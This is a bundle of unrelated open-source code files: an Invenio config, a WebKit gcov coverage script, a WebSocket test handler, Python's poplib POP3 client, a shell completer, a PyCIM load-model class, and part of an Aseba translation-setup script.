JohnGeorgiadis/invenio | invenio/utils/plotextractor/config.py | 7 | 1089 | # -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2010, 2011, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Plotextractor configuration."""
from __future__ import unicode_literals
__revision__ = "$Id$"
# CFG_PLOTEXTRACTOR_DESY_BASE --
CFG_PLOTEXTRACTOR_DESY_BASE = 'http://www-library.desy.de/preparch/desy/'
# CFG_PLOTEXTRACTOR_DESY_PIECE --
CFG_PLOTEXTRACTOR_DESY_PIECE = '/desy'
| gpl-2.0 |
sloanyang/android_external_webkit | Tools/CodeCoverage/cov.py | 27 | 7773 | # Copyright (C) 2004, 2005, 2006 Nathaniel Smith
# Copyright (C) 2006, 2007 Holger Hans Peter Freyther
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Apple Computer, Inc. ("Apple") nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY APPLE AND ITS CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import csv
import time
import os.path
import shutil
def analyze_coverage(possible_gcov_files, source_files, runid, data_dir, base):
if not os.path.exists(data_dir):
os.makedirs(data_dir)
output = open(os.path.join(data_dir, runid + ".csv"), "w")
w = csv.writer(output)
# First row: id and time
w.writerow([runid, time.time()])
results = scan_gcov_files(possible_gcov_files, source_files)
annotated_dir = os.path.join(data_dir, runid + ".annotated")
if os.path.exists(annotated_dir):
shutil.rmtree(annotated_dir)
keys = results.keys()
keys.sort()
for path in keys:
(total, covered, annotated_data) = results[path]
path = path[path.find(base)+len(base):]
# Rest of the rows: filename, total_lines, covered_lines
w.writerow([path, total, covered])
if path[:1] == "/":
path = path[1:]
annotated_path = os.path.join(annotated_dir, path)
try:
os.makedirs(os.path.dirname(annotated_path))
except OSError:
pass
a = open(annotated_path, "w")
a.write(annotated_data)
a.close()
# zecke's rewrite
STATE_NOT_CODE = -1
STATE_NOT_SEEN = -2
STATE_TEST_CODE = -3
def find_gcov(f, possible_gcovs):
"""
Find .gcov files that could be of interest for us
"""
try:
return possible_gcovs[f]
except:
return []
def parse_source_file(file):
"""
Parse one source file and return a list of lines
"""
f_source_list = []
init_state = STATE_NOT_SEEN
in_test_code = False
nesting = 0
for line in open(file, "r"):
code = line.split(":", 2)[-1]
if not in_test_code and code.startswith("#ifdef BUILD_UNIT_TESTS"):
in_test_code = 1
if in_test_code and code.startswith("#if"):
nesting += 1
if in_test_code and code.startswith("#endif"):
nesting -= 1
if not nesting:
in_test_code = True
if in_test_code:
init_state = STATE_TEST_CODE
else:
init_state = STATE_NOT_SEEN
f_source_list.append([init_state, line.split(":", 1)[1]])
return f_source_list
# Runner-up, 3rd annual "write Python that looks like Perl" competition,
# Well, not really. It doesn't even use regexps.
# He is right so I'm cleaning it up (zecke)
def scan_gcov_files(possible_gcov_files, source_files):
"""Takes a list of gcov filenames and a list of source filenames.
The gcov files should have names of the form foo.o##foo.cc.gcov, as
created by 'gcov -l'.
Returns a dict mapping source filenames to tuples
(total_lines, tested_lines, gcov_annotated_source)
which are a number, a number, and a very long string, respectively.
The fun bit is that we merge .gcov output generated by different object
files; this way we can provide accurate information for header files and
for monotone's current unit test system."""
results = {}
for f in source_files:
possible_gcovs = find_gcov(f, possible_gcov_files)
base_name = os.path.splitext(os.path.basename(f))[0]
if len(possible_gcovs) == 0:
print "No gcov files found for: '%s' but it was compiled" % f
continue
(garbage,extension) = os.path.splitext(f)
if extension in [".cc", ".c", ".moc", ".cpp", ".cxx", ".m", ".mm"]:
lines = open(f, "r").readlines()
results[f] = (len(lines), 0, "".join(lines))
continue
elif len(possible_gcovs) > 1:
print "More than one gcov file for %s %d" % (f,len(possible_gcovs))
base_gcov_lines = parse_source_file(possible_gcovs[0])
# Now we will try hard to merge the results with others
# Our requirement is that we have the same amount of lines as
# as the original file
for cov_file in possible_gcovs:
lines = open(cov_file, "r").readlines()
# e.g. with phonon we have visualisation.h and we can not know
# which header file (foldername) it is refering to. This is a gcov
# limitation and i have no workaround yet. We just hope we will pick
# the right header file...
if len(lines) != len(base_gcov_lines):
print "Error Base: %s and Target: %s have different amount of lines" % (possible_gcovs[0],cov_file)
continue
# now do the merging of the file. If it has the same basename
# and the same number of lines things might work out
# In the future take a look at the header of the file
i = 0
for line in lines:
accumulator = base_gcov_lines[i]
if accumulator[0] != STATE_TEST_CODE:
info = line.split(":", 1)[0]
if info.endswith("-"):
if accumulator[0] == STATE_NOT_SEEN:
accumulator[0] = STATE_NOT_CODE
else:
if info.endswith("#"):
num = 0
else:
num = int(info)
if accumulator[0] in (STATE_NOT_SEEN, STATE_NOT_CODE):
accumulator[0] = 0
accumulator[0] += num
i += 1
# post processing of ths file
(total_lines, total_covered) = (0, 0)
annotated_lines = []
for state, line in base_gcov_lines:
if state == STATE_NOT_SEEN:
desc = "?????"
elif state == STATE_TEST_CODE:
desc = "+"
elif state == STATE_NOT_CODE:
desc = "-"
elif state == 0:
desc = "#####"
total_lines += 1
else:
desc = str(state)
total_lines += 1
total_covered += 1
annotated_lines.append(":".join([desc.rjust(9), line]))
results[f] = (total_lines, total_covered, "".join(annotated_lines))
return results
return results
| gpl-2.0 |
wuhengzhi/chromium-crosswalk | third_party/WebKit/LayoutTests/http/tests/websocket/simple_wsh.py | 42 | 1741 | # Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mod_pywebsocket import msgutil
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
msgutil.send_message(request, 'Hello from Simple WSH.')
| bsd-3-clause |
lache/RacingKingLee | monitor/engine.win64/2.74/python/lib/poplib.py | 74 | 14327 | """A POP3 client class.
Based on the J. Myers POP3 draft, Jan. 96
"""
# Author: David Ascher <david_ascher@brown.edu>
# [heavily stealing from nntplib.py]
# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]
# String method conversion and test jig improvements by ESR, February 2001.
# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003
# Example (see the test function at the end of this file)
# Imports
import errno
import re
import socket
try:
import ssl
HAVE_SSL = True
except ImportError:
HAVE_SSL = False
__all__ = ["POP3","error_proto"]
# Exception raised when an error or invalid response is received:
class error_proto(Exception): pass
# Standard Port
POP3_PORT = 110
# POP SSL PORT
POP3_SSL_PORT = 995
# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)
CR = b'\r'
LF = b'\n'
CRLF = CR+LF
# maximal line length when calling readline(). This is to prevent
# reading arbitrary lenght lines. RFC 1939 limits POP3 line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
class POP3:
"""This class supports both the minimal and optional command sets.
Arguments can be strings or integers (where appropriate)
(e.g.: retr(1) and retr('1') both work equally well.
Minimal Command Set:
USER name user(name)
PASS string pass_(string)
STAT stat()
LIST [msg] list(msg = None)
RETR msg retr(msg)
DELE msg dele(msg)
NOOP noop()
RSET rset()
QUIT quit()
Optional Commands (some servers support these):
RPOP name rpop(name)
APOP name digest apop(name, digest)
TOP msg n top(msg, n)
UIDL [msg] uidl(msg = None)
CAPA capa()
STLS stls()
Raises one exception: 'error_proto'.
Instantiate with:
POP3(hostname, port=110)
NB: the POP protocol locks the mailbox from user
authorization until QUIT, so be sure to get in, suck
the messages, and quit, each time you access the
mailbox.
POP is a line-based protocol, which means large mail
messages consume lots of python cycles reading them
line-by-line.
If it's available on your mail server, use IMAP4
instead, it doesn't suffer from the two problems
above.
"""
encoding = 'UTF-8'
def __init__(self, host, port=POP3_PORT,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.port = port
self._tls_established = False
self.sock = self._create_socket(timeout)
self.file = self.sock.makefile('rb')
self._debugging = 0
self.welcome = self._getresp()
def _create_socket(self, timeout):
return socket.create_connection((self.host, self.port), timeout)
def _putline(self, line):
if self._debugging > 1: print('*put*', repr(line))
self.sock.sendall(line + CRLF)
# Internal: send one command to the server (through _putline())
def _putcmd(self, line):
if self._debugging: print('*cmd*', repr(line))
line = bytes(line, self.encoding)
self._putline(line)
# Internal: return one line from the server, stripping CRLF.
# This is where all the CPU time of this module is consumed.
# Raise error_proto('-ERR EOF') if the connection is closed.
def _getline(self):
line = self.file.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise error_proto('line too long')
if self._debugging > 1: print('*get*', repr(line))
if not line: raise error_proto('-ERR EOF')
octets = len(line)
# server can send any combination of CR & LF
# however, 'readline()' returns lines ending in LF
# so only possibilities are ...LF, ...CRLF, CR...LF
if line[-2:] == CRLF:
return line[:-2], octets
if line[0] == CR:
return line[1:-1], octets
return line[:-1], octets
# Internal: get a response from the server.
# Raise 'error_proto' if the response doesn't start with '+'.
def _getresp(self):
resp, o = self._getline()
if self._debugging > 1: print('*resp*', repr(resp))
if not resp.startswith(b'+'):
raise error_proto(resp)
return resp
# Internal: get a response plus following text from the server.
def _getlongresp(self):
resp = self._getresp()
list = []; octets = 0
line, o = self._getline()
while line != b'.':
if line.startswith(b'..'):
o = o-1
line = line[1:]
octets = octets + o
list.append(line)
line, o = self._getline()
return resp, list, octets
# Internal: send a command and get the response
def _shortcmd(self, line):
self._putcmd(line)
return self._getresp()
# Internal: send a command and get the response plus following text
def _longcmd(self, line):
self._putcmd(line)
return self._getlongresp()
# These can be useful:
def getwelcome(self):
return self.welcome
def set_debuglevel(self, level):
self._debugging = level
# Here are all the POP commands:
def user(self, user):
"""Send user name, return response
(should indicate password required).
"""
return self._shortcmd('USER %s' % user)
def pass_(self, pswd):
"""Send password, return response
(response includes message count, mailbox size).
NB: mailbox is locked by server from here to 'quit()'
"""
return self._shortcmd('PASS %s' % pswd)
def stat(self):
"""Get mailbox status.
Result is tuple of 2 ints (message count, mailbox size)
"""
retval = self._shortcmd('STAT')
rets = retval.split()
if self._debugging: print('*stat*', repr(rets))
numMessages = int(rets[1])
sizeMessages = int(rets[2])
return (numMessages, sizeMessages)
def list(self, which=None):
"""Request listing, return result.
Result without a message number argument is in form
['response', ['mesg_num octets', ...], octets].
Result when a message number argument is given is a
single response: the "scan listing" for that message.
"""
if which is not None:
return self._shortcmd('LIST %s' % which)
return self._longcmd('LIST')
def retr(self, which):
"""Retrieve whole message number 'which'.
Result is in form ['response', ['line', ...], octets].
"""
return self._longcmd('RETR %s' % which)
def dele(self, which):
"""Delete message number 'which'.
Result is 'response'.
"""
return self._shortcmd('DELE %s' % which)
def noop(self):
"""Does nothing.
One supposes the response indicates the server is alive.
"""
return self._shortcmd('NOOP')
def rset(self):
"""Unmark all messages marked for deletion."""
return self._shortcmd('RSET')
def quit(self):
"""Signoff: commit changes on server, unlock mailbox, close connection."""
resp = self._shortcmd('QUIT')
self.close()
return resp
def close(self):
"""Close the connection without assuming anything about it."""
if self.file is not None:
self.file.close()
if self.sock is not None:
try:
self.sock.shutdown(socket.SHUT_RDWR)
except OSError as e:
# The server might already have closed the connection
if e.errno != errno.ENOTCONN:
raise
finally:
self.sock.close()
self.file = self.sock = None
#__del__ = quit
# optional commands:
def rpop(self, user):
"""Not sure what this does."""
return self._shortcmd('RPOP %s' % user)
timestamp = re.compile(br'\+OK.*(<[^>]+>)')
def apop(self, user, password):
"""Authorisation
- only possible if server has supplied a timestamp in initial greeting.
Args:
user - mailbox user;
password - mailbox password.
NB: mailbox is locked by server from here to 'quit()'
"""
secret = bytes(password, self.encoding)
m = self.timestamp.match(self.welcome)
if not m:
raise error_proto('-ERR APOP not supported by server')
import hashlib
digest = m.group(1)+secret
digest = hashlib.md5(digest).hexdigest()
return self._shortcmd('APOP %s %s' % (user, digest))
def top(self, which, howmuch):
"""Retrieve message header of message number 'which'
and first 'howmuch' lines of message body.
Result is in form ['response', ['line', ...], octets].
"""
return self._longcmd('TOP %s %s' % (which, howmuch))
def uidl(self, which=None):
"""Return message digest (unique id) list.
If 'which', result contains unique id for that message
in the form 'response mesgnum uid', otherwise result is
the list ['response', ['mesgnum uid', ...], octets]
"""
if which is not None:
return self._shortcmd('UIDL %s' % which)
return self._longcmd('UIDL')
def capa(self):
"""Return server capabilities (RFC 2449) as a dictionary
>>> c=poplib.POP3('localhost')
>>> c.capa()
{'IMPLEMENTATION': ['Cyrus', 'POP3', 'server', 'v2.2.12'],
'TOP': [], 'LOGIN-DELAY': ['0'], 'AUTH-RESP-CODE': [],
'EXPIRE': ['NEVER'], 'USER': [], 'STLS': [], 'PIPELINING': [],
'UIDL': [], 'RESP-CODES': []}
>>>
Really, according to RFC 2449, the cyrus folks should avoid
having the implementation split into multiple arguments...
"""
def _parsecap(line):
lst = line.decode('ascii').split()
return lst[0], lst[1:]
caps = {}
try:
resp = self._longcmd('CAPA')
rawcaps = resp[1]
for capline in rawcaps:
capnm, capargs = _parsecap(capline)
caps[capnm] = capargs
except error_proto as _err:
raise error_proto('-ERR CAPA not supported by server')
return caps
def stls(self, context=None):
"""Start a TLS session on the active connection as specified in RFC 2595.
context - a ssl.SSLContext
"""
if not HAVE_SSL:
raise error_proto('-ERR TLS support missing')
if self._tls_established:
raise error_proto('-ERR TLS session already established')
caps = self.capa()
if not 'STLS' in caps:
raise error_proto('-ERR STLS not supported by server')
if context is None:
context = ssl._create_stdlib_context()
resp = self._shortcmd('STLS')
server_hostname = self.host if ssl.HAS_SNI else None
self.sock = context.wrap_socket(self.sock,
server_hostname=server_hostname)
self.file = self.sock.makefile('rb')
self._tls_established = True
return resp
if HAVE_SSL:
class POP3_SSL(POP3):
"""POP3 client class over SSL connection
Instantiate with: POP3_SSL(hostname, port=995, keyfile=None, certfile=None,
context=None)
hostname - the hostname of the pop3 over ssl server
port - port number
keyfile - PEM formatted file that contains your private key
certfile - PEM formatted certificate chain file
context - a ssl.SSLContext
See the methods of the parent class POP3 for more documentation.
"""
def __init__(self, host, port=POP3_SSL_PORT, keyfile=None, certfile=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT, context=None):
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
self.keyfile = keyfile
self.certfile = certfile
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.context = context
POP3.__init__(self, host, port, timeout)
def _create_socket(self, timeout):
sock = POP3._create_socket(self, timeout)
server_hostname = self.host if ssl.HAS_SNI else None
sock = self.context.wrap_socket(sock,
server_hostname=server_hostname)
return sock
def stls(self, keyfile=None, certfile=None, context=None):
"""The method unconditionally raises an exception since the
STLS command doesn't make any sense on an already established
SSL/TLS session.
"""
raise error_proto('-ERR TLS session already established')
__all__.append("POP3_SSL")
if __name__ == "__main__":
import sys
a = POP3(sys.argv[1])
print(a.getwelcome())
a.user(sys.argv[2])
a.pass_(sys.argv[3])
a.list()
(numMsgs, totalSize) = a.stat()
for i in range(1, numMsgs + 1):
(header, msg, octets) = a.retr(i)
print("Message %d:" % i)
for line in msg:
print(' ' + line)
print('-----------------------')
a.quit()
| mit |
alehander42/woosh-python | woosh/completer.py | 1 | 1740 | import os
import os.path
import woosh.parser
def complete(code, env):
try:
woo_type, expected, tokens = woosh.parser.parse_broken(code, env)
except (woosh.parser.WooError, ValueError):
return []
finished = not code or code[-1] == ' '
return [globals()['complete_%s' % tab](woo_type, tokens[-1][1], env, finished) for tab in expected]
def complete_fun(woo_type, token, env, finished=True):
# returns a list with the matching function names in env
f = env
completions = set()
while f:
completions.update(
g for g, value
in f.values.items()
if hasattr(value, 'code') and (finished or g.startswith(token)))
f = f.parent
return list(completions)
def complete_path(woo_type, token, env, finished=True):
# returns a list with the matching paths in current dir
return [f for f in os.listdir('.') if finished or f.startswith(token)]
def complete_method(woo_type, token, env, finished=True):
# returns a list with the matching methods of woo_type
if not hasattr(woo_type.return_type, 'methods'):
return []
return ['{0}{1}'.format('#' if m[0].isalpha() else '', m)
for m in woo_type.return_type.methods
if finished or m.startswith(token[1:])]
def complete_arg(woo_type, token, env, finished=True):
# returns a list with the matching kwargs of woo_type
return ['@{0}'.format(label)
for label in woo_type.kwargs
if finished or label.startswith(token[1:])] # @arg
def complete_anon_var(woo_type, token, env, finished=True):
# returns a list with the possible anon vars
if '$'.startswith(token):
return ['$']
else:
return []
| mit |
rwl/PyCIM | CIM14/CDPSM/Balanced/IEC61970/LoadModel/LoadResponseCharacteristic.py | 1 | 8379 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.CDPSM.Balanced.IEC61970.Core.IdentifiedObject import IdentifiedObject
class LoadResponseCharacteristic(IdentifiedObject):
"""Models the characteristic response of the load demand due to to changes in system conditions such as voltage and frequency. This is not related to demand response.
If LoadResponseCharacteristic.exponentModel is True, the voltage exponents are specified and used as to calculate:
Active power component = Pnominal * (Voltage/cim:BaseVoltage.nominalVoltage) ** cim:LoadResponseCharacteristic.pVoltageExponent
Reactive power component = Qnominal * (Voltage/cim:BaseVoltage.nominalVoltage)** cim:LoadResponseCharacteristic.qVoltageExponent
Where * means 'multiply' and ** is 'raised to power of'.
"""
def __init__(self, pVoltageExponent=0.0, qConstantCurrent=0.0, pFrequencyExponent=0.0, exponentModel=False, qConstantImpedance=0.0, pConstantCurrent=0.0, qFrequencyExponent=0.0, pConstantPower=0.0, qVoltageExponent=0.0, qConstantPower=0.0, pConstantImpedance=0.0, EnergyConsumer=None, *args, **kw_args):
"""Initialises a new 'LoadResponseCharacteristic' instance.
@param pVoltageExponent: Exponent of per unit voltage effecting real power. This model used only when 'useExponentModel' is true.
@param qConstantCurrent: Portion of reactive power load modeled as constant current. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
@param pFrequencyExponent: Exponent of per unit frequency effecting active power
@param exponentModel: Indicates the exponential voltage dependency model (pVoltateExponent and qVoltageExponent) is to be used. If false, the coeficient model (consisting of pConstantImpedance, pConstantCurrent, pConstantPower, qConstantImpedance, qConstantCurrent, and qConstantPower) is to be used.
@param qConstantImpedance: Portion of reactive power load modeled as constant impedance. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
@param pConstantCurrent: Portion of active power load modeled as constant current. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
@param qFrequencyExponent: Exponent of per unit frequency effecting reactive power
@param pConstantPower: Portion of active power load modeled as constant power. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
@param qVoltageExponent: Exponent of per unit voltage effecting reactive power. This model used only when 'useExponentModel' is true.
@param qConstantPower: Portion of reactive power load modeled as constant power. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
@param pConstantImpedance: Portion of active power load modeled as constant impedance. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
@param EnergyConsumer: The set of loads that have the response characteristics.
"""
#: Exponent of per unit voltage effecting real power. This model used only when 'useExponentModel' is true.
self.pVoltageExponent = pVoltageExponent
#: Portion of reactive power load modeled as constant current. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
self.qConstantCurrent = qConstantCurrent
#: Exponent of per unit frequency effecting active power
self.pFrequencyExponent = pFrequencyExponent
#: Indicates the exponential voltage dependency model (pVoltateExponent and qVoltageExponent) is to be used. If false, the coeficient model (consisting of pConstantImpedance, pConstantCurrent, pConstantPower, qConstantImpedance, qConstantCurrent, and qConstantPower) is to be used.
self.exponentModel = exponentModel
#: Portion of reactive power load modeled as constant impedance. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
self.qConstantImpedance = qConstantImpedance
#: Portion of active power load modeled as constant current. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
self.pConstantCurrent = pConstantCurrent
#: Exponent of per unit frequency effecting reactive power
self.qFrequencyExponent = qFrequencyExponent
#: Portion of active power load modeled as constant power. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
self.pConstantPower = pConstantPower
#: Exponent of per unit voltage effecting reactive power. This model used only when 'useExponentModel' is true.
self.qVoltageExponent = qVoltageExponent
#: Portion of reactive power load modeled as constant power. Used only if the useExponentModel is false. This value is noralized against the sum of qZ, qI, and qP.
self.qConstantPower = qConstantPower
#: Portion of active power load modeled as constant impedance. Used only if the useExponentModel is false. This value is noralized against the sum of pZ, pI, and pP.
self.pConstantImpedance = pConstantImpedance
self._EnergyConsumer = []
self.EnergyConsumer = [] if EnergyConsumer is None else EnergyConsumer
super(LoadResponseCharacteristic, self).__init__(*args, **kw_args)
_attrs = ["pVoltageExponent", "qConstantCurrent", "pFrequencyExponent", "exponentModel", "qConstantImpedance", "pConstantCurrent", "qFrequencyExponent", "pConstantPower", "qVoltageExponent", "qConstantPower", "pConstantImpedance"]
_attr_types = {"pVoltageExponent": float, "qConstantCurrent": float, "pFrequencyExponent": float, "exponentModel": bool, "qConstantImpedance": float, "pConstantCurrent": float, "qFrequencyExponent": float, "pConstantPower": float, "qVoltageExponent": float, "qConstantPower": float, "pConstantImpedance": float}
_defaults = {"pVoltageExponent": 0.0, "qConstantCurrent": 0.0, "pFrequencyExponent": 0.0, "exponentModel": False, "qConstantImpedance": 0.0, "pConstantCurrent": 0.0, "qFrequencyExponent": 0.0, "pConstantPower": 0.0, "qVoltageExponent": 0.0, "qConstantPower": 0.0, "pConstantImpedance": 0.0}
_enums = {}
_refs = ["EnergyConsumer"]
_many_refs = ["EnergyConsumer"]
def getEnergyConsumer(self):
"""The set of loads that have the response characteristics.
"""
return self._EnergyConsumer
def setEnergyConsumer(self, value):
for x in self._EnergyConsumer:
x.LoadResponse = None
for y in value:
y._LoadResponse = self
self._EnergyConsumer = value
EnergyConsumer = property(getEnergyConsumer, setEnergyConsumer)
def addEnergyConsumer(self, *EnergyConsumer):
for obj in EnergyConsumer:
obj.LoadResponse = self
def removeEnergyConsumer(self, *EnergyConsumer):
for obj in EnergyConsumer:
obj.LoadResponse = None
| mit |
marvelous/aseba | maintainer/translations/01_new_language.py | 2 | 5842 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Aseba - an event-based framework for distributed robot control
# Copyright (C) 2007--2015:
# Stephane Magnenat <stephane at magnenat dot net>
# (http://stephane.magnenat.net)
# and other contributors, see authors.txt for details
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import os.path
import subprocess
import shutil
import re
from path import *
import translation_tools
# some tags inside the files to help us
cpp_tag = re.compile(r"/\* insert translation here")
studio_qrc_tag = re.compile(r"<!-- insert translation here")
studio_qrc_compiler_tag = re.compile(r"<!-- insert compiler translation here")
sync_compiler_py_tag = re.compile(r"# insert translation here")
updatedoc_tag = sync_compiler_py_tag
challenge_qrc_tag = studio_qrc_tag
def insert_before_tag(input_file, output_file, tag_re, inserted_text):
with open(input_file) as in_file:
with open(output_file, "w") as out_file:
found = False
for line in in_file:
if tag_re.search(line):
found = True
# insert the text before the tag
out_file.write(inserted_text)
out_file.write(line)
if not found:
print sys.stderr, "Tag not found in ", input_file
return found
print "*****"
print "This will add a new language to the available translations."
print "We need first a few information."
print "*****"
print ""
translation_tools.init_commands()
name_en = raw_input("\nLanguage name (in English): ")
name = raw_input("Language name, as displayed to users (ex: Français): ")
print "\n***"
print "Hint: for a list a locales, you can look here: http://www.roseindia.net/tutorials/i18n/locales-list.shtml"
print "***\n"
code_lang = raw_input("Language code (ex: fr): ")
code_region = raw_input("Region code, if any (ex: ch): ")
if code_region == '':
code = code_lang
else:
code = code_lang + "_" + code_region
wikidot_url = ""
if raw_input("\nIs the wikidot user manual also translated and to be added to the offline help? [y/N] ").lower() == 'y':
wikidot_url = "https://aseba.wikidot.com/{}:asebausermanual".format(code) # should be good
temp = raw_input("What is its url? [{}] ".format(wikidot_url))
if temp:
wikidot_url = temp
if raw_input("\nAre you happy with your input? [y/N] ").lower() != 'y':
exit(2)
print "Generating files...\n"
os.chdir(studio_path)
# lupdate / lrelease asebastudio_x.{ts,qm}
translation_tools.do_lupdate_lrelease("asebastudio", code, " ".join([studio_path, plugin_path, vpl_path, blockly_path]))
# lupdate / lrelease compiler_x.{ts,qm}
translation_tools.do_lupdate_lrelease("compiler", code, compiler_ts_path)
os.chdir(challenge_path)
# lupdate / lrelease asebachallenge_x.{ts,qm}
translation_tools.do_lupdate_lrelease("asebachallenge", code, challenge_cpp)
print "Modifying source files...\n"
# We have to update DashelTarget.cpp
print "Updating DashelTarget.cpp..."
os.chdir(studio_path)
tmp_file = "DashelTarget.cpp.tmp"
insert_before_tag(dashel_target, tmp_file, cpp_tag, """\t\tlanguageSelectionBox->addItem(QString::fromUtf8("{}"), "{}");\n""".format(name, code))
os.remove(dashel_target)
shutil.move(tmp_file, dashel_target)
translation_tools.do_git_add(dashel_target)
print "Done\n"
# We have to update asebastudio.qrc
print "Updating asebastudio.qrc..."
tmp_file1 = "asebastudio.qrc.tmp1"
tmp_file2 = "asebastudio.qrc.tmp2"
insert_before_tag(studio_qrc, tmp_file1, studio_qrc_tag, """\t<file>asebastudio_{}.qm</file>\n""".format(code))
insert_before_tag(tmp_file1, tmp_file2, studio_qrc_compiler_tag, """\t<file>compiler_{}.qm</file>\n""".format(code))
os.remove(tmp_file1)
os.remove(studio_qrc)
